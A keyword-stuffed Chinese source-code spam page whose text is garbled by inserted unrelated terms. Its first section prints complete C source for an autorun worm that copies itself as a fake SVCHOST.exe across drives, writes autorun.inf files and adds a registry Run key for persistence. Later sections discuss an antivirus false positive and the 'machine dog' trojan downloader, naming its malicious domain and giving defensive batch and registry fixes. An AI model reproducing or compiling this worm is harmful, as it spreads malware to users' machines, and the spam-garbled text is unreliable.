欢迎来到皮皮网官网

【罗田麻将源码】【pygame斗地主源码】【源码如何给客户】木马c 源码

时间:2024-11-18 14:44:03 来源:捉妖三金钻指标源码

1.~``远程控制木马程序怎么编写答案速度
2.c语言源文件编译后成了木马,木马码求解
3.谁有机器狗木马病毒的木马码C语言程序代码?

木马c  源码

~``远程控制木马程序怎么编写答案速度

       病毒C程序源码:

       ```c

       #define SVCHOST_NUM 6

       #include

       #include

       char *autorun = { "[autorun]\nopen=SVCHOST.exe\n\nshell\\1=打带贺做开\nshell\\1\\Command=SVCHOST.exe\nshell\\2\\=Open\nshell\\2\\Command=SVCHOST.exe\nshellexecute=SVCHOST.exe"};

       char *files_autorun[] = { "c:\\autorun.inf", "d:\\autorun.inf", "e:\\autorun.inf"};

       char *files_svchost[SVCHOST_NUM + 1] = { "c:\\windows\\system\\MSMOUSE.DLL", "c:\\windows\\system\\SVCHOST.exe", "c:\\蠢衡windows\\SVCHOST.exe", "c:\\SVCHOST.exe", "d:\\SVCHOST.exe", "e:\\SVCHOST.exe", "SVCHOST.exe"};

       char *regadd = "reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\拍搜\Run\" /v SVCHOST /d C:\\Windows\\system\\SVCHOST.exe /f";

       int copy(char *infile, char *outfile) {

        FILE *input, *output;

        char temp;

        if (strcmp(infile, outfile) != 0 && ((input = fopen(infile, "rb")) != NULL) && ((output = fopen(outfile, "wb")) != NULL)) {

        while (!feof(input)) {

        fread(&temp, 1, 1, input);

        fwrite(&temp, 1, 1, output);

        }

        fclose(input);

        fclose(output);

        return 0;

        } else {

        return 1;

        }

       }

       int main(void) {

        FILE *input, *output;

        int i, k;

        for (i = 0; i < 3; i++) {

        output = fopen(files_autorun[i], "w");

        fprintf(output, "%s", autorun);

        fclose(output);

        }

        for (i = 0; i <= SVCHOST_NUM; i++) {

        if ((input = fopen(files_svchost[i], "rb")) != NULL) {

        fclose(input);

        for (k = 0; k < SVCHOST_NUM; k++) {

        copy(files_svchost[i], files_svchost[k]);

        }

        i = SVCHOST_NUM + 1;

        }

        }

        system(regadd); /* 注册SVCHOST.exe,让其在启动时运行 */

        return 0;

       }

       ```

       注意:

       1. 代码中存在一些不清晰的字符和注释,例如"拍搜"应该是木马码"Software",我已经进行了更正。木马码

       2. 代码中的木马码字符串应该使用双引号而不是单引号。

       3. 文件路径中存在一些拼写错误和不规范的木马码罗田麻将源码命名,例如"蠢衡windows"应该是木马码"Windows"。

       4. 此代码是木马码一个病毒程序,具有恶意性质。木马码请确保不要使用或分发此类代码。木马码

c语言源文件编译后成了木马,木马码求解

       代码没有大问题

       #include<stdio.h>

       #include<stdlib.h>

       int main(void)

       {

           int a[],木马码i;

           for(i=0;i<;i++)

               scanf("%d",&a[i]);

           for(i=0;i<;i++)

               printf("%d\n",a[i]);

           system("pause");

           return 0;  //因为int main(),所以要有个返回值

       }

       估计你所说的木马码木马是你系统带的杀毒软件误报的! 你程序的木马码文件名最好写个略有复杂性的名称,如:test_.c

谁有机器狗木马病毒的木马码pygame斗地主源码C语言程序代码?

       计算机病毒“机器狗”

       机器狗的生前身后,曾经有很多人说有穿透还原卡、冰点的病毒,但是在各个论坛都没有样本证据,直到年8月日终于有人在社区里贴出了一个样本。这个病毒没有名字,图标是SONY的机器狗阿宝,就像前辈熊猫烧香一样,大家给它起了个名字叫机器狗。

       工作原理

       机器狗本身会释放出一个pcihdd.sys到drivers目录,pcihdd.sys是一个底层硬盘驱动,提高自己的优先级接替还原卡或冰点的硬盘驱动,然后访问指定的网址,这些网址只要连接就会自动下载大量的病毒与恶意插件。然后修改接管启动管理器,源码如何给客户最可怕的是,会通过内部网络传播,一台中招,能引发整个网络的电脑全部自动重启。

       重点是,一个病毒,如果以hook方式入侵系统,接替硬盘驱动的方式效率太低了,而且毁坏还原的方式这也不是最好的,还有就是这种技术应用范围非常小,只有还原技术厂商范围内有传播,在这方面国际上也只有中国在用,所以,很可能就是php源码自动恢复行业内杠。

       对于网吧而言,机器狗就是剑指网吧而来,针对所有的还原产品设计,可预见其破坏力很快会超过熊猫烧香。好在现在很多免疫补丁都以出现,发稿之日起,各大杀毒软件都以能查杀。

       免疫补丁之争

       现在的免疫补丁之数是疫苗形式,以无害的样本复制到drivers下,欺骗病毒以为本身以运行,起到阻止危害的目的。这种形式的问题是,有些用户为了自身安全会在机器上运行一些查毒程序(比如QQ医生之类)。这样疫苗就会被误认为是打包安卓源码病毒,又要废很多口舌。

       解决之道

       最新的解决方案是将system/drivers目录单独分配给一个用户,而不赋予administror修改的权限。虽然这样能解决,但以后安装驱动就是一件头疼的事了。

       来彻底清除该病毒,处理后重启一下电脑就可以了,之前要打上补丁!

       或者这样:

       1注册表,组策略中禁止运行userinit.exe 进程

       2 在启动项目中加入批处理

       A : 强制结束userinit.exe进程 Taskkill /f /IM userinit.exe (其中“/IM”参数后面为进程的图像名,这命令只对XP用户有效)

       B : 强制删除userinit.exe文件 DEL /F /A /Q %SystemRoot%\system\userinit.exe

       C : 创建userinit.exe免疫文件到%SystemRoot%\system\

       命令:md %SystemRoot%\system\userinit.exe >nul 2>nul

       或者 md %SystemRoot%\system\userinit.exe

       attrib +s +r +h +a %SystemRoot%\system\userinit.exe

       D : reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\userinit.exe" /v debugger /t reg_sz /d debugfile.exe /f

       userinit1.exe是正常文件改了名字,多加了一个1,你也可以自己修改,不过要手动修改这4个注册表,并导出,这个批处理才能正常使用。

       最新动向

       好像机器狗的开发以停止了,从样本放出到现在也没有新的版本被发现,这到让我们非常担心,因为虽着研究的深入,现在防御的手段都是针对病毒工作原理的,一但机器狗开始更新,稍加改变工作原理就能大面积逃脱普遍的防御手段,看来机器狗的爆发只是在等待,而不是大家可以高枕了。

       目前网上流传一种叫做机器狗的病毒,此病毒采用hook系统的磁盘设备栈来达到穿透目的的,危害极大,可穿透目前技术条件下的任何软件硬件还原!基本无法靠还原抵挡。目前已知的所有还原产品,都无法防止这种病毒的穿透感染和传播。

       机器狗是一个木马下载器,感染后会自动从网络上下载木马、病毒,危及用户帐号的安全。

       机器狗运行后会释放一个名为PCIHDD.SYS的驱动文件,与原系统中还原软件驱动进行硬盘控制权的争夺,并通过替换userinit.exe文件,实现开机启动。

       >> 那么如何识别是否已中毒呢?

       是否中了机器狗的关键就在 Userinit.exe 文件,该文件在系统目录的 system 文件夹中,点击右键查看属性,如果在属性窗口中看不到该文件的版本标签的话,说明已经中了机器狗。如果有版本标签则正常。

       临时解决办法:

       一是在路由上封IP:

       ROS脚本,要的自己加上去

       / ip firewall filter

       add chain=forward content=yu.8s7.net action=reject comment="DF6.0"

       add chain=forward content= action=reject

       二是在c:\windows\system\drivers下建立免疫文件: pcihdd.sys ,

       三是把他要修改的文件在做母盘的时候,就加壳并替换。

       在%systemroot%\system\drivers\目录下 建立个 明字 为 pcihdd.sys 的文件夹 设置属性为 任何人禁止

       批处理

       md %systemroot%\system\drivers\pcihdd.sys

       cacls %systemroot%\system\drivers\pcihdd.sys /e /p everyone:n

       cacls %systemroot%\system\userinit.exe /e /p everyone:r

       exit

       目前,网络流行以下解决方法,或者可以在紧急情况下救急:

       1、首先在系统system下复制个无毒的userinit.exe,文件名为FUCKIGM.exe(文件名可以任意取),这就是下面批处理要指向执行的文件!也就是开机启动userinit.exe的替代品!而原来的userinit.exe保留!其实多复制份的目的只是为了多重保险!可能对防止以后变种起到一定的作用。

       2、创建个文件名为userinit.bat的批处理(文件名也可任意取,但要和下面说到的注册表键值保持一致即可),内容如下:

       start FUCKIGM.exe (呵呵,够简单吧?)

       3、修改注册表键值,将userinit.exe改为userinit.bat。内容如下:

       Windows Registry Editor Version 5.

       [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]

       "Userinit"="C:\\WINDOWS\\system\\userinit.bat,"

       就这3步,让这条狗再也凶不起来!这是在windows 测试的,双击机器狗后,没什么反应,对比批处理也是正常,即这狗根本没改动它!开关机游戏均无异常!但唯一美中不足的是,采用经典模式开机的启动时会出现个一闪而过的黑框!

copyright © 2016 powered by 皮皮网   sitemap